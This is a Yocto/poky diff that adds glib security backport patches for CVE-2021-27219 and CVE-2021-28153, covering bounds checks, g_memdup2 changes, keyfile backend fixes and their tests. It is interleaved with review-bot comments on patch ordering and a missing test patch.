"gstrfuncsprivate.h" + #include "gtlspassword.h" + + #include <string.h> +@@ -287,9 +288,14 @@ g_tls_password_set_value (GTlsPassword *password, + g_return_if_fail (G_IS_TLS_PASSWORD (password)); + + if (length < 0) +- length = strlen ((gchar *)value); ++ { ++ /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */ ++ gsize length_unsigned = strlen ((gchar *) value); ++ g_return_if_fail (length_unsigned > G_MAXSSIZE); ++ length = (gssize) length_unsigned; ++ } + +- g_tls_password_set_value_full (password, g_memdup (value, length), length, g_free); ++ g_tls_password_set_value_full (password, g_memdup2 (value, (gsize) length), length, g_free); + } + + /** +-- 
+GitLab
+
+
diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
new file mode 100644
index 0000000000..a620a49269
--- /dev/null
+++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
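Review bot: `g_return_if_fail (length_unsigned > G_MAXSSIZE);` in the `length < 0` branch of g_tls_password_set_value() is inverted: it returns early for every password that fits in a gssize, so a nul-terminated password is never stored when this patch is applied on its own. CVE-2021-27219-11.patch has the same inversion in `g_return_if_fail (length_size > G_MAXUINT);` and also assigns the signed `length` to `line_term_len`. The corrections arrive as separate files (reg1-1, reg1-2, reg1-4), so the build is only correct if the recipe applies those after -10 and -11; the recipe change is not visible in this part of the diff, so that ordering should be confirmed. A header line in each of the two patches such as `Note: requires CVE-2021-27219-reg1-4.patch, which corrects the inverted check` would make the dependency explicit.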
@@ -0,0 +1,63 @@ +From ecdf91400e9a538695a0895b95ad7e8abcdf1749 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Thu, 4 Feb 2021 14:09:40 +0000 +Subject: [PATCH 11/11] giochannel: Forbid very long line terminator strings +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +The public API `GIOChannel.line_term_len` is only a `guint`. Ensure that +nul-terminated strings passed to `g_io_channel_set_line_term()` can’t +exceed that length. Use `g_memdup2()` to avoid a warning (`g_memdup()` +is due to be deprecated), but not to avoid a bug, since it’s also +limited to `G_MAXUINT`. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> +Helps: #2319 + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + glib/giochannel.c | 17 +++++++++++++---- + 1 file changed, 13 insertions(+), 4 deletions(-) + +diff --git a/glib/giochannel.c b/glib/giochannel.c +index c6a89d6e0..4dec20f77 100644 +--- a/glib/giochannel.c ++++ b/glib/giochannel.c +@@ -887,16 +887,25 @@ g_io_channel_set_line_term (GIOChannel *channel, + const gchar *line_term, + gint length) + { ++ guint length_unsigned; ++ + g_return_if_fail (channel != NULL); + g_return_if_fail (line_term == NULL || length != 0); /* Disallow "" */ + + if (line_term == NULL) +- length = 0; +- else if (length < 0) +- length = strlen (line_term); ++ length_unsigned = 0; ++ else if (length >= 0) ++ length_unsigned = (guint) length; ++ else ++ { ++ /* FIXME: We’re constrained by line_term_len being a guint here */ ++ gsize length_size = strlen (line_term); ++ g_return_if_fail (length_size > G_MAXUINT); ++ length_unsigned = (guint) length_size; ++ } + + g_free (channel->line_term); +- channel->line_term = line_term ? 
g_memdup (line_term, length) : NULL; ++ channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL; + channel->line_term_len = length; + } + +-- +GitLab + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch new file mode 100644 index 0000000000..3047062f54 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-1.patch @@ -0,0 +1,36 @@ +From f8273b9aded135fe07094faebd527e43851aaf6e Mon Sep 17 00:00:00 2001 +From: "Jan Alexander Steffens (heftig)" <jan.steffens@gmail.com> +Date: Sun, 7 Feb 2021 23:32:40 +0100 +Subject: [PATCH 1/5] giochannel: Fix length_size bounds check + +The inverted condition is an obvious error introduced by ecdf91400e9a. + +Fixes https://gitlab.gnome.org/GNOME/glib/-/issues/2323 + +(cherry picked from commit a149bf2f9030168051942124536e303af8ba6176) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + glib/giochannel.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/glib/giochannel.c b/glib/giochannel.c +index 4dec20f77..c3f3102ff 100644 +--- a/glib/giochannel.c ++++ b/glib/giochannel.c +@@ -896,7 +896,7 @@ g_io_channel_set_line_term (GIOChannel *channel, + { + /* FIXME: We’re constrained by line_term_len being a guint here */ + gsize length_size = strlen (line_term); +- g_return_if_fail (length_size > G_MAXUINT); ++ g_return_if_fail (length_size <= G_MAXUINT); + length_unsigned = (guint) length_size; + } + +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch new file mode 100644 index 0000000000..2ba26075df --- /dev/null 
+++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-2.patch @@ -0,0 +1,38 @@ +From e069c50467712e6d607822afd6b6c15c2c343dff Mon Sep 17 00:00:00 2001 +From: Simon McVittie <smcv@collabora.com> +Date: Mon, 8 Feb 2021 10:34:50 +0000 +Subject: [PATCH 2/5] giochannel: Don't store negative line_term_len in + GIOChannel struct + +Adding test coverage indicated that this was another bug in 0cc11f74. + +Fixes: 0cc11f74 "giochannel: Forbid very long line terminator strings" +Resolves: https://gitlab.gnome.org/GNOME/glib/-/issues/2323 +Signed-off-by: Simon McVittie <smcv@collabora.com> +(cherry picked from commit 5dc8b0014c03e7491d93b90275ab442e888a9628) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + glib/giochannel.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/glib/giochannel.c b/glib/giochannel.c +index c3f3102ff..19bb06ba6 100644 +--- a/glib/giochannel.c ++++ b/glib/giochannel.c +@@ -902,7 +902,7 @@ g_io_channel_set_line_term (GIOChannel *channel, + + g_free (channel->line_term); + channel->line_term = line_term ? g_memdup2 (line_term, length_unsigned) : NULL; +- channel->line_term_len = length; ++ channel->line_term_len = length_unsigned; + } + + /** +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch new file mode 100644 index 0000000000..2c388b4bbb --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-4.patch 
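Review bot: The series goes from `[PATCH 2/5]` in this file to `[PATCH 4/5]` in CVE-2021-27219-reg1-4.patch, and no reg1-3 file is added between them in this diff. The commit message here says the bug was found by adding test coverage, so the part left out is presumably the giochannel test, which would mean the `line_term_len` fix is carried without the regression test that exposed it. If the omission is deliberate, I would record the reason in this header, for example `Note: [PATCH 3/5] (test only) not backported because <reason>`; otherwise it should be added as reg1-3.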
@@ -0,0 +1,38 @@ +From 4506d1859a863087598c8d122740bae25b65b099 Mon Sep 17 00:00:00 2001 +From: Simon McVittie <smcv@collabora.com> +Date: Mon, 8 Feb 2021 10:04:48 +0000 +Subject: [PATCH 4/5] gtlspassword: Fix inverted assertion + +The intention here was to assert that the length of the password fits +in a gssize. Passwords more than half the size of virtual memory are +probably excessive. + +Fixes: a8b204ff "gtlspassword: Forbid very long TLS passwords" +Signed-off-by: Simon McVittie <smcv@collabora.com> +(cherry picked from commit 61bb52ec42de1082bfb06ce1c737fc295bfe60b8) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gtlspassword.c | 2 +- + 1 file changed, 1 insertion(+), 1 deletion(-) + +diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c +index dbcec41a8..bd86a6dfe 100644 +--- a/gio/gtlspassword.c ++++ b/gio/gtlspassword.c +@@ -291,7 +291,7 @@ g_tls_password_set_value (GTlsPassword *password, + { + /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */ + gsize length_unsigned = strlen ((gchar *) value); +- g_return_if_fail (length_unsigned > G_MAXSSIZE); ++ g_return_if_fail (length_unsigned <= G_MAXSSIZE); + length = (gssize) length_unsigned; + } + +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch new file mode 100644 index 0000000000..356e986fe0 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg1-5.patch 
@@ -0,0 +1,100 @@ +From 3d1550354c3c6a8491c39881752d51cb7515f2c2 Mon Sep 17 00:00:00 2001 +From: Simon McVittie <smcv@collabora.com> +Date: Mon, 8 Feb 2021 10:22:39 +0000 +Subject: [PATCH 5/5] tls-interaction: Add test coverage for various ways to + set the password + +Signed-off-by: Simon McVittie <smcv@collabora.com> +(cherry picked from commit df4501316ca3903072400504a5ea76498db19538) + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/tests/tls-interaction.c | 55 +++++++++++++++++++++++++++++++++++++ + 1 file changed, 55 insertions(+) + +diff --git a/gio/tests/tls-interaction.c b/gio/tests/tls-interaction.c +index 4f0737d7e..5661e8e0d 100644 +--- a/gio/tests/tls-interaction.c ++++ b/gio/tests/tls-interaction.c +@@ -174,6 +174,38 @@ test_interaction_ask_password_finish_failure (GTlsInteraction *interaction, + } + + ++/* Return a copy of @str that is allocated in a silly way, to exercise ++ * custom free-functions. The returned pointer points to a copy of @str ++ * in a buffer of the form "BEFORE \0 str \0 AFTER". */ ++static guchar * ++special_dup (const char *str) ++{ ++ GString *buf = g_string_new ("BEFORE"); ++ guchar *ret; ++ ++ g_string_append_c (buf, '\0'); ++ g_string_append (buf, str); ++ g_string_append_c (buf, '\0'); ++ g_string_append (buf, "AFTER"); ++ ret = (guchar *) g_string_free (buf, FALSE); ++ return ret + strlen ("BEFORE") + 1; ++} ++ ++ ++/* Free a copy of @str that was made with special_dup(), after asserting ++ * that it has not been corrupted. 
*/ ++static void ++special_free (gpointer p) ++{ ++ gchar *s = p; ++ gchar *buf = s - strlen ("BEFORE") - 1; ++ ++ g_assert_cmpstr (buf, ==, "BEFORE"); ++ g_assert_cmpstr (s + strlen (s) + 1, ==, "AFTER"); ++ g_free (buf); ++} ++ ++ + static GTlsInteractionResult + test_interaction_ask_password_sync_success (GTlsInteraction *interaction, + GTlsPassword *password, +@@ -181,6 +213,8 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction, + GError **error) + { + TestInteraction *self; ++ const guchar *value; ++ gsize len; + + g_assert (TEST_IS_INTERACTION (interaction)); + self = TEST_INTERACTION (interaction); +@@ -192,6 +226,27 @@ test_interaction_ask_password_sync_success (GTlsInteraction *interaction, + g_assert (error != NULL); + g_assert (*error == NULL); + ++ /* Exercise different ways to set the value */ ++ g_tls_password_set_value (password, (const guchar *) "foo", 4); ++ len = 0; ++ value = g_tls_password_get_value (password, &len); ++ g_assert_cmpmem (value, len, "foo", 4); ++ ++ g_tls_password_set_value (password, (const guchar *) "bar", -1); ++ len = 0; ++ value = g_tls_password_get_value (password, &len); ++ g_assert_cmpmem (value, len, "bar", 3); ++ ++ g_tls_password_set_value_full (password, special_dup ("baa"), 4, special_free); ++ len = 0; ++ value = g_tls_password_get_value (password, &len); ++ g_assert_cmpmem (value, len, "baa", 4); ++ ++ g_tls_password_set_value_full (password, special_dup ("baz"), -1, special_free); ++ len = 0; ++ value = g_tls_password_get_value (password, &len); ++ g_assert_cmpmem (value, len, "baz", 3); ++ + /* Don't do this in real life. Include a null terminator for testing */ + g_tls_password_set_value (password, (const guchar *)"the password", 13); + return G_TLS_INTERACTION_HANDLED; +-- +GitLab + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch new file mode 100644 index 0000000000..dd43689aae 
--- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-1.patch @@ -0,0 +1,49 @@ +From cb9ee701ef46c1819eed4e2a4dc181682bdfc176 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 10 Feb 2021 21:16:39 +0000 +Subject: [PATCH 1/3] gkeyfilesettingsbackend: Fix basename handling when group + is unset + +Fix an effective regression in commit +7781a9cbd2fd0aa84bee0f4eee88470640ff6706, which happens when +`convert_path()` is called with a `key` which contains no slashes. In +that case, the `key` is entirely the `basename`. + +Prior to commit 7781a9cb, the code worked through a fluke of `i == -1` +cancelling out with the various additions in the `g_memdup()` call, and +effectively resulting in `g_strdup (key)`. + +Spotted by Guido Berhoerster. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gkeyfilesettingsbackend.c | 7 ++++++- + 1 file changed, 6 insertions(+), 1 deletion(-) + +diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c +index 25b057672..861c3a661 100644 +--- a/gio/gkeyfilesettingsbackend.c ++++ b/gio/gkeyfilesettingsbackend.c +@@ -185,7 +185,12 @@ convert_path (GKeyfileSettingsBackend *kfsb, + } + + if (basename) +- *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key)); ++ { ++ if (last_slash != NULL) ++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key)); ++ else ++ *basename = g_strdup (key); ++ } + + return TRUE; + } +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch new file mode 100644 index 0000000000..04503641c3 --- /dev/null 
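Review bot: The length argument in `g_memdup2 (last_slash + 1, key_len - (last_slash - key))` is easy to misread as an off-by-one, because it is the length of the text after the slash plus one byte for the terminating nul. A comment above that line would help, e.g. `/* copies the basename and its nul: strlen (last_slash + 1) + 1 bytes */`. This assumes `key_len` is `strlen (key)`, which is set outside the hunk, as is the rest of convert_path().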
+++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-2.patch @@ -0,0 +1,43 @@ +From 31e0d403ba635dbbacbfbff74295e5db02558d76 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 10 Feb 2021 21:19:30 +0000 +Subject: [PATCH 2/3] gkeyfilesettingsbackend: Disallow empty key or group + names + +These should never have been allowed; they will result in precondition +failures from the `GKeyFile` later on in the code. + +A test will be added for this shortly. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/gkeyfilesettingsbackend.c | 7 +++++++ + 1 file changed, 7 insertions(+) + +diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c +index 861c3a661..de216e615 100644 +--- a/gio/gkeyfilesettingsbackend.c ++++ b/gio/gkeyfilesettingsbackend.c +@@ -158,6 +158,13 @@ convert_path (GKeyfileSettingsBackend *kfsb, + + last_slash = strrchr (key, '/'); + ++ /* Disallow empty group names or key names */ ++ if (key_len == 0 || ++ (last_slash != NULL && ++ (*(last_slash + 1) == '\0' || ++ last_slash == key))) ++ return FALSE; ++ + if (kfsb->root_group) + { + /* if a root_group was specified, make sure the user hasn't given +-- +GitLab + + diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch new file mode 100644 index 0000000000..65f59287a8 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-reg2-3.patch 
@@ -0,0 +1,232 @@ +Backport of: + +From 221c26685354dea2b2732df94404e8e5e77a1591 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 10 Feb 2021 21:21:36 +0000 +Subject: [PATCH 3/3] tests: Add tests for key name handling in the keyfile + backend + +This tests the two recent commits. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-27219 +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/tests/gsettings.c | 170 +++++++++++++++++++++++++++++++++++++++++- + 1 file changed, 169 insertions(+), 1 deletion(-) + +--- a/gio/tests/gsettings.c ++++ b/gio/tests/gsettings.c +@@ -1,3 +1,4 @@ ++#include <errno.h> + #include <stdlib.h> + #include <locale.h> + #include <libintl.h> +@@ -1740,6 +1741,14 @@ key_changed_cb (GSettings *settings, con + (*b) = TRUE; + } + ++typedef struct ++{ ++ const gchar *path; ++ const gchar *root_group; ++ const gchar *keyfile_group; ++ const gchar *root_path; ++} KeyfileTestData; ++ + /* + * Test that using a keyfile works + */ +@@ -1834,7 +1843,11 @@ test_keyfile (Fixture *fixture, + g_free (str); + + g_settings_set (settings, "farewell", "s", "cheerio"); +- ++ ++ /* Check that empty keys/groups are not allowed. */ ++ g_assert_false (g_settings_is_writable (settings, "")); ++ g_assert_false (g_settings_is_writable (settings, "/")); ++ + /* When executing as root, changing the mode of the keyfile will have + * no effect on the writability of the settings. + */ +@@ -1866,6 +1879,149 @@ test_keyfile (Fixture *fixture, + g_free (keyfile_path); + } + ++/* ++ * Test that using a keyfile works with a schema with no path set. 
++ */ ++static void ++test_keyfile_no_path (Fixture *fixture, ++ gconstpointer user_data) ++{ ++ const KeyfileTestData *test_data = user_data; ++ GSettingsBackend *kf_backend; ++ GSettings *settings; ++ GKeyFile *keyfile; ++ gboolean writable; ++ gchar *key = NULL; ++ GError *error = NULL; ++ gchar *keyfile_path = NULL, *store_path = NULL; ++ ++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL); ++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL); ++ kf_backend = g_keyfile_settings_backend_new (store_path, test_data->root_path, test_data->root_group); ++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, test_data->path); ++ g_object_unref (kf_backend); ++ ++ g_settings_reset (settings, "test-boolean"); ++ g_assert_true (g_settings_get_boolean (settings, "test-boolean")); ++ ++ writable = g_settings_is_writable (settings, "test-boolean"); ++ g_assert_true (writable); ++ g_settings_set (settings, "test-boolean", "b", FALSE); ++ ++ g_assert_false (g_settings_get_boolean (settings, "test-boolean")); ++ ++ g_settings_delay (settings); ++ g_settings_set (settings, "test-boolean", "b", TRUE); ++ g_settings_apply (settings); ++ ++ keyfile = g_key_file_new (); ++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL)); ++ ++ g_assert_true (g_key_file_get_boolean (keyfile, test_data->keyfile_group, "test-boolean", NULL)); ++ ++ g_key_file_free (keyfile); ++ ++ g_settings_reset (settings, "test-boolean"); ++ g_settings_apply (settings); ++ keyfile = g_key_file_new (); ++ g_assert_true (g_key_file_load_from_file (keyfile, store_path, 0, NULL)); ++ ++ g_assert_false (g_key_file_get_string (keyfile, test_data->keyfile_group, "test-boolean", &error)); ++ g_assert_error (error, G_KEY_FILE_ERROR, G_KEY_FILE_ERROR_KEY_NOT_FOUND); ++ g_clear_error (&error); ++ ++ /* Check that empty keys/groups are not allowed. 
*/ ++ g_assert_false (g_settings_is_writable (settings, "")); ++ g_assert_false (g_settings_is_writable (settings, "/")); ++ ++ /* Keys which ghost the root group name are not allowed. This can only be ++ * tested when the path is `/` as otherwise it acts as a prefix and prevents ++ * any ghosting. */ ++ if (g_str_equal (test_data->path, "/")) ++ { ++ key = g_strdup_printf ("%s/%s", test_data->root_group, ""); ++ g_assert_false (g_settings_is_writable (settings, key)); ++ g_free (key); ++ ++ key = g_strdup_printf ("%s/%s", test_data->root_group, "/"); ++ g_assert_false (g_settings_is_writable (settings, key)); ++ g_free (key); ++ ++ key = g_strdup_printf ("%s/%s", test_data->root_group, "test-boolean"); ++ g_assert_false (g_settings_is_writable (settings, key)); ++ g_free (key); ++ } ++ ++ g_key_file_free (keyfile); ++ g_object_unref (settings); ++ ++ /* Clean up the temporary directory. */ ++ g_assert_cmpint (g_chmod (keyfile_path, 0777) == 0 ? 0 : errno, ==, 0); ++ g_assert_cmpint (g_remove (store_path) == 0 ? 0 : errno, ==, 0); ++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0); ++ g_free (store_path); ++ g_free (keyfile_path); ++} ++ ++/* ++ * Test that a keyfile rejects writes to keys outside its root path. ++ */ ++static void ++test_keyfile_outside_root_path (Fixture *fixture, ++ gconstpointer user_data) ++{ ++ GSettingsBackend *kf_backend; ++ GSettings *settings; ++ gchar *keyfile_path = NULL, *store_path = NULL; ++ ++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL); ++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL); ++ kf_backend = g_keyfile_settings_backend_new (store_path, "/tests/basic-types/", "root"); ++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/tests/"); ++ g_object_unref (kf_backend); ++ ++ g_assert_false (g_settings_is_writable (settings, "test-boolean")); ++ ++ g_object_unref (settings); ++ ++ /* Clean up the temporary directory. 
The keyfile probably doesn’t exist, so ++ * don’t error on failure. */ ++ g_remove (store_path); ++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 0 : errno, ==, 0); ++ g_free (store_path); ++ g_free (keyfile_path); ++} ++ ++/* ++ * Test that a keyfile rejects writes to keys in the root if no root group is set. ++ */ ++static void ++test_keyfile_no_root_group (Fixture *fixture, ++ gconstpointer user_data) ++{ ++ GSettingsBackend *kf_backend; ++ GSettings *settings; ++ gchar *keyfile_path = NULL, *store_path = NULL; ++ ++ keyfile_path = g_build_filename (fixture->tmp_dir, "keyfile", NULL); ++ store_path = g_build_filename (keyfile_path, "gsettings.store", NULL); ++ kf_backend = g_keyfile_settings_backend_new (store_path, "/", NULL); ++ settings = g_settings_new_with_backend_and_path ("org.gtk.test.no-path", kf_backend, "/"); ++ g_object_unref (kf_backend); ++ ++ g_assert_false (g_settings_is_writable (settings, "test-boolean")); ++ g_assert_true (g_settings_is_writable (settings, "child/test-boolean")); ++ ++ g_object_unref (settings); ++ ++ /* Clean up the temporary directory. The keyfile probably doesn’t exist, so ++ * don’t error on failure. */ ++ g_remove (store_path); ++ g_assert_cmpint (g_rmdir (keyfile_path) == 0 ? 
0 : errno, ==, 0); ++ g_free (store_path); ++ g_free (keyfile_path); ++} ++ + /* Test that getting child schemas works + */ + static void +@@ -2844,6 +3000,14 @@ main (int argc, char *argv[]) + gchar *override_text; + gchar *enums; + gint result; ++ const KeyfileTestData keyfile_test_data_explicit_path = { "/tests/", "root", "tests", "/" }; ++ const KeyfileTestData keyfile_test_data_empty_path = { "/", "root", "root", "/" }; ++ const KeyfileTestData keyfile_test_data_long_path = { ++ "/tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch/", ++ "root", ++ "tests/path/is/very/long/and/this/makes/some/comparisons/take/a/different/branch", ++ "/" ++ }; + + /* Meson build sets this */ + #ifdef TEST_LOCALE_PATH +@@ -2967,6 +3131,11 @@ main (int argc, char *argv[]) + } + + g_test_add ("/gsettings/keyfile", Fixture, NULL, setup, test_keyfile, teardown); ++ g_test_add ("/gsettings/keyfile/explicit-path", Fixture, &keyfile_test_data_explicit_path, setup, test_keyfile_no_path, teardown); ++ g_test_add ("/gsettings/keyfile/empty-path", Fixture, &keyfile_test_data_empty_path, setup, test_keyfile_no_path, teardown); ++ g_test_add ("/gsettings/keyfile/long-path", Fixture, &keyfile_test_data_long_path, setup, test_keyfile_no_path, teardown); ++ g_test_add ("/gsettings/keyfile/outside-root-path", Fixture, NULL, setup, test_keyfile_outside_root_path, teardown); ++ g_test_add ("/gsettings/keyfile/no-root-group", Fixture, NULL, setup, test_keyfile_no_root_group, teardown); + g_test_add_func ("/gsettings/child-schema", test_child_schema); + g_test_add_func ("/gsettings/strinfo", test_strinfo); + g_test_add_func ("/gsettings/enums", test_enums); diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch new file mode 100644 index 0000000000..c89ca20726 --- /dev/null +++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-1.patch 
@@ -0,0 +1,27 @@
+From 78420a75aeb70569a8cd79fa0fea7b786b6f785f Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 24 Feb 2021 17:33:38 +0000
+Subject: [PATCH 1/5] glocalfileoutputstream: Fix a typo in a comment
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-28153
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/glocalfileoutputstream.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+--- a/gio/glocalfileoutputstream.c
++++ b/gio/glocalfileoutputstream.c
+@@ -851,7 +851,7 @@ handle_overwrite_open (const char *fi
+ mode = mode_from_flags_or_info (flags, reference_info);
+
+ /* We only need read access to the original file if we are creating a backup.
+- * We also add O_CREATE to avoid a race if the file was just removed */
++ * We also add O_CREAT to avoid a race if the file was just removed */
+ if (create_backup || readable)
+ open_flags = O_RDWR | O_CREAT | O_BINARY;
+ else
diff --git a/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
new file mode 100644
index 0000000000..8a35bab4de
--- /dev/null
+++ b/poky/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-28153-2.patch
@@ -0,0 +1,42 @@ +From 32d3d02a50e7dcec5f4cf7908e7ac88d575d8fc5 Mon Sep 17 00:00:00 2001 +From: Philip Withnall <pwithnall@endlessos.org> +Date: Wed, 24 Feb 2021 17:34:32 +0000 +Subject: [PATCH 2/5] tests: Stop using g_test_bug_base() in file tests +MIME-Version: 1.0 +Content-Type: text/plain; charset=UTF-8 +Content-Transfer-Encoding: 8bit + +Since a following commit is going to add a new test which references +Gitlab, so it’s best to move the URI bases inside the test cases. + +Signed-off-by: Philip Withnall <pwithnall@endlessos.org> + +Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz] +CVE: CVE-2021-28153 +Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com> +Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com> + +--- + gio/tests/file.c | 4 +--- + 1 file changed, 1 insertion(+), 3 deletions(-) + +--- a/gio/tests/file.c ++++ b/gio/tests/file.c +@@ -685,7 +685,7 @@ test_replace_cancel (void) + guint count; + GError *error = NULL; + +- g_test_bug ("629301"); ++ g_test_bug ("https://bugzilla.gnome.org/629301"); + + path = g_dir_make_tmp ("g_file_replace_cancel_XXXXXX", &error); + g_assert_no_error (error); +@@ -1784,8 +1784,6 @@ main (int argc, char *argv[]) + { + g_test_init (&argc, &argv, NULL); + +- g_test_bug_base ("http://bugzilla.gnome.org/"); +- + g_test_add_func ("/file/basic", test_basic); + g_test_add_func 